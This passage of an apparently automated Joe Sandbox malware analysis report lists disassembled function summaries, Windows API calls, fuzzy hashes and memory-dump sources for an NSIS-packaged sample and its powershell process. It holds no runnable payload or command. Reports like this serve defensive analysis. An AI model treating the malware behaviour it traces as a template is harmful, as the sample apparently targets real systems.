                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID:
                                                                      • API String ID: 3449924974-0
                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                      • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                      APIs
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                      • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CCD
                                                                      • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: (Gz
                                                                      • API String ID: 3248276644-3338112938
                                                                      • Opcode ID: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                      • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                      • Opcode Fuzzy Hash: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                      • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004052A2
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                        • Part of subcall function 0040425A: SendMessageW.USER32(?,?,00000000,00000000), ref: 0040426C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                      • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405DDA
                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040336A,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,774D3420,004035B6), ref: 00405DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: nsa
                                                                      • API String ID: 1716503409-2209301699
                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                      • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D2B
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {YIp^$YIp^
                                                                      • API String ID: 0-2571092133
                                                                      • Opcode ID: 78e35213b8028ad64a993874c1972fc9f638a9e7f2ff5157f5b7685323419f16
                                                                      • Instruction ID: 028daa2c9f99f9d82405638caf87732fb00ae49da1525cc9ceab46584bd73da6
                                                                      • Opcode Fuzzy Hash: 78e35213b8028ad64a993874c1972fc9f638a9e7f2ff5157f5b7685323419f16
                                                                      • Instruction Fuzzy Hash: 09915E76B406145FDB19DBB98410AAFBBE2FFC4B00B44896DE056AB340DF346E058BD6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-1679444440
                                                                      • Opcode ID: f4e4a71b78c45317b72399bf3e009023a368717c2203181514399ab8e95b3f1d
                                                                      • Instruction ID: fdad0d8eec81336b31f919d9f3849ada713a4e37cf12af199207e3fa8dfce964
                                                                      • Opcode Fuzzy Hash: f4e4a71b78c45317b72399bf3e009023a368717c2203181514399ab8e95b3f1d
                                                                      • Instruction Fuzzy Hash: 1F22F4B5B002069FDB158F6888487ABB7E1BF86210F1484BBD545CB3D1DBB5D941CBE1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 0ecece8ec8677fcdbcb4316494b351b79ae5c0a4cecfd6a02e60e0e0d4213954
                                                                      • Instruction ID: 38a57fbcb450f85f57ee2e18fab7ea6c2c78f386a4f973e503aad343df95ebdd
                                                                      • Opcode Fuzzy Hash: 0ecece8ec8677fcdbcb4316494b351b79ae5c0a4cecfd6a02e60e0e0d4213954
                                                                      • Instruction Fuzzy Hash: 4141B030A042459FCB15DFB8D864AADBBF2FF4A300F1485A9E456AB362DB306D45CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: a45359befa7e029d33509fa54ce53e78d81e7b689766f248830c824c2c960717
                                                                      • Instruction ID: ec6bdcef5de36afe5c67adf9c5c021d594ffec01520ba96de40a89828181432d
                                                                      • Opcode Fuzzy Hash: a45359befa7e029d33509fa54ce53e78d81e7b689766f248830c824c2c960717
                                                                      • Instruction Fuzzy Hash: 6E41D531A042458FCB11DF78D864AADBFF1FF4A304F1885A9E456AB362DB306D45CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k
                                                                      • API String ID: 0-1631774145
                                                                      • Opcode ID: 0615f047eeec194bbcb80a0d13383ab32fb35bde30bbe4cc751c150beffd1d8e
                                                                      • Instruction ID: f74c897dc387543053a76360c12a93d844ad81abb5f8ab1480c707b0d912db69
                                                                      • Opcode Fuzzy Hash: 0615f047eeec194bbcb80a0d13383ab32fb35bde30bbe4cc751c150beffd1d8e
                                                                      • Instruction Fuzzy Hash: 8D317C30A002058FDB14DF69E994B9EBBF2FF88704F148529E416A7391DB31AD45CF91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +/Ip^
                                                                      • API String ID: 0-3713844593
                                                                      • Opcode ID: ffbbc22a17c2ac13d07ff87186e3199eca9bc9cd630909cb6b604bff9cc1cba8
                                                                      • Instruction ID: e5f598f162e2e0245e29e4ef6d914ff1eb18cb95b5d7a3c88977d7aeb5b54dfa
                                                                      • Opcode Fuzzy Hash: ffbbc22a17c2ac13d07ff87186e3199eca9bc9cd630909cb6b604bff9cc1cba8
                                                                      • Instruction Fuzzy Hash: 03F0B4316082545FCB06A75DA8209EF7BABDECB57130844ABF4898B301EB619D05C7F2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +/Ip^
                                                                      • API String ID: 0-3713844593
                                                                      • Opcode ID: f0fb05ba3aca4a79dabf7e3b06f68c6cb2054dfe4375fb5d536bc875fd38f1ab
                                                                      • Instruction ID: 5afed4d734c0ac9d2613df443cf52f4ccfbfa256e3da956bc786057e2c4b7f71
                                                                      • Opcode Fuzzy Hash: f0fb05ba3aca4a79dabf7e3b06f68c6cb2054dfe4375fb5d536bc875fd38f1ab
                                                                      • Instruction Fuzzy Hash: 22E08C32700614078A11A61EA900A5F77DBDEC9AB1354842EF05A8B340DFA5DD45CBE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f127cda7c8888d2a0673b6ba623e4c61da83ff8a9d9c36ea3770ceac08d5d382
                                                                      • Instruction ID: 46637556c1fb0ef8d5e16f342d815e1fc5b6cfa96e553714c33346db96651dac
                                                                      • Opcode Fuzzy Hash: f127cda7c8888d2a0673b6ba623e4c61da83ff8a9d9c36ea3770ceac08d5d382
                                                                      • Instruction Fuzzy Hash: 33919E74B042248FDF14DF69D550A6DBBF6BF88614B24406AE806EB361DF70DC41CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 66e7a57074bcf55185064473f01f5c0cb701120b7a8fc4cca182a8ff8e89761c
                                                                      • Instruction ID: c1f1720a37162c86e492d8ae8a99286d00dfe3818222298030ec52b953b729ca
                                                                      • Opcode Fuzzy Hash: 66e7a57074bcf55185064473f01f5c0cb701120b7a8fc4cca182a8ff8e89761c
                                                                      • Instruction Fuzzy Hash: 9D91AE70A046059FCB15CF98C498AAEFBF1FF48314B248659E915AB365C736EC91CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80bc952e080d90c40e1378e3a0da200514c36c0750ab4d43a6c1e5f0841db425
                                                                      • Instruction ID: ab0a65b652bd7ed75d911f1aaed5b1f481b343fdd0f1c5e3ae539ef380926113
                                                                      • Opcode Fuzzy Hash: 80bc952e080d90c40e1378e3a0da200514c36c0750ab4d43a6c1e5f0841db425
                                                                      • Instruction Fuzzy Hash: F151CE743142159FEB049B69D844F3AB7EAFFC9614F1585AAE40ACB352EB31DC01CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8702a9b8da6b87b506a0d44c8e6abdedf93c707a51825662dd1c2e5854913dff
                                                                      • Instruction ID: b89522593c97960e41026c22b552d80b2a5445c38c9d14bda1074b3fd7f5b00e
                                                                      • Opcode Fuzzy Hash: 8702a9b8da6b87b506a0d44c8e6abdedf93c707a51825662dd1c2e5854913dff
                                                                      • Instruction Fuzzy Hash: 00610571E002489FDB14DFA9D584B9DBBF1EF88314F25812AE809AB354EB709D81CB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afa0c817ea8cbafada5f41abbfc360ff901e4ab87b356daccaed1c0cca76a080
                                                                      • Instruction ID: 598bcd29d6a595820fb7e8771bdfd432e4ad74e944e08292b9e0c1d73f742a58
                                                                      • Opcode Fuzzy Hash: afa0c817ea8cbafada5f41abbfc360ff901e4ab87b356daccaed1c0cca76a080
                                                                      • Instruction Fuzzy Hash: 61512771E002489FDF14CFA9D584B9DBBF1EF88314F15806AE809AB365DB709C45CB60
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5bd9a5aed32376f05c0c8653e8c3972aa0d9b477c162ea0820f35a940a49b85d
                                                                      • Instruction ID: dd9eb9becaea62ff08c476f389e60e7dc976a140cac4a4ffe4aec6b0af89b3e6
                                                                      • Opcode Fuzzy Hash: 5bd9a5aed32376f05c0c8653e8c3972aa0d9b477c162ea0820f35a940a49b85d
                                                                      • Instruction Fuzzy Hash: 79514B74700305CFDB10EF68C594B6ABBE6AF8921075885A9E449CF362EBB4EC41CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af569040c1c3ccdf8b4ea0382bfbe26c15ecfc2fdccb2a3fee47e088a6bf541b
                                                                      • Instruction ID: 037797034547206f7d94cd25ae0afc9477a85c08ce1f0304d5fdced579a16175
                                                                      • Opcode Fuzzy Hash: af569040c1c3ccdf8b4ea0382bfbe26c15ecfc2fdccb2a3fee47e088a6bf541b
                                                                      • Instruction Fuzzy Hash: BC413874700205CFDB10EF6CC584B6AB7E6EFC92107548569E449DB366EBB4EC41CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ddcc6e3dbda84506635f6cf70abb8aa7d4b9dae96309973f22bffc9319301f9d
                                                                      • Instruction ID: 28c0fb7b1833955a35a5df5e2ed7c6e2af6af6962f15282a4a6cd4eee9aebb51
                                                                      • Opcode Fuzzy Hash: ddcc6e3dbda84506635f6cf70abb8aa7d4b9dae96309973f22bffc9319301f9d
                                                                      • Instruction Fuzzy Hash: CF415974B14204CFEB14DB64C468BAEBBF2EF8E611F244099E446AB3A1CB75DC01CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5c79d2d555ae9ba4712c4e672eec38f0c48fffa818111bdd37f296396bd8f8f
                                                                      • Instruction ID: 5fdb66025fcc06a5fef23676139a33a1fbbcad5f6c710d19b98f66ee2f15269e
                                                                      • Opcode Fuzzy Hash: e5c79d2d555ae9ba4712c4e672eec38f0c48fffa818111bdd37f296396bd8f8f
                                                                      • Instruction Fuzzy Hash: 57411674A00609AFCB19CF99C498EAAF7F1FF48314B158259D915AB364C736EC91CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Instruction Fuzzy Hash: 62018C35B002148FCF119BB4E908AAEBBB6FF88215F14446DE50AD3342DB32A911CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 190f5b91624a284a955e5ceb7b19827baaf963f0966297db61e902c4b5f34da0
                                                                      • Instruction ID: 4e174f06daac19682e8582987f6a62db3b0f3847c6e5043b5443b8d68e2584ba
                                                                      • Opcode Fuzzy Hash: 190f5b91624a284a955e5ceb7b19827baaf963f0966297db61e902c4b5f34da0
                                                                      • Instruction Fuzzy Hash: ED01FE75B091845FCF069778D4505FDBFB29F8E124B1844EEE4C29B352D7214C46CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ddade4f1327d5adaa6ae2ff485363cd24c93ad7269ea01ec71e1311aff27e8e
                                                                      • Instruction ID: 7116ad7215751143d36fe1d475f5d994de0cc44783558581560454b475e0a05d
                                                                      • Opcode Fuzzy Hash: 3ddade4f1327d5adaa6ae2ff485363cd24c93ad7269ea01ec71e1311aff27e8e
                                                                      • Instruction Fuzzy Hash: F301F4313092A41FD7118BB99C609FB7FF9DF8A22071940ABF881C7362C6B08C04C760
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07298eb75aeec28a05ea2c3fd4ececb521ed18a7cfd32748ead8c7bbb69f94bd
                                                                      • Instruction ID: 3bccc79910432282df5f0c60d455ce0f3ec55a870eac53b74a6a653f8e82f8c5
                                                                      • Opcode Fuzzy Hash: 07298eb75aeec28a05ea2c3fd4ececb521ed18a7cfd32748ead8c7bbb69f94bd
                                                                      • Instruction Fuzzy Hash: 8301A7755043409BE7208E19CDC4F67BBD8DF42324F18C5BEED490B142C6799941CAB1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 82c24e12b3b920b515e08caf6a3b2d7a15275036d2bdc5496d77aa61752a9d1c
                                                                      • Instruction ID: 4d3841a1d7ca830b73ab512660b170e38bf324c4bbb0c0eed388ce85fb6f0576
                                                                      • Opcode Fuzzy Hash: 82c24e12b3b920b515e08caf6a3b2d7a15275036d2bdc5496d77aa61752a9d1c
                                                                      • Instruction Fuzzy Hash: 65015E6640E3C09FD7168B258D94B66BFA4DF53224F1981DBDC888F193C2695848CB72
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f3cb1a62389db53912efb70642ee11170b661b14bb079682575c3f5816b0828
                                                                      • Instruction ID: 4725f4039e842c000527b579ec3c375fa7173629370cb13d16d1da217ac2d337
                                                                      • Opcode Fuzzy Hash: 3f3cb1a62389db53912efb70642ee11170b661b14bb079682575c3f5816b0828
                                                                      • Instruction Fuzzy Hash: 0EF0C8356053506FC7158779E844A6FBBE5EF8966070406AEE08AC7292CE645C45C771
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d74a7f00f2ea5920955a5f9f61dfeeb9d2db1e98b95368a63d15859c440339ad
                                                                      • Instruction ID: 4233d453c7961afbc7ecc224d97d7b2a4cc4a212931b11c4fbfd1e3a91a01396
                                                                      • Opcode Fuzzy Hash: d74a7f00f2ea5920955a5f9f61dfeeb9d2db1e98b95368a63d15859c440339ad
                                                                      • Instruction Fuzzy Hash: 6B01F2726082804FD7065B7890247AB3FB1EF83714F2840DAD8848B353DE352C06C7A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739548138.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_bcd000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
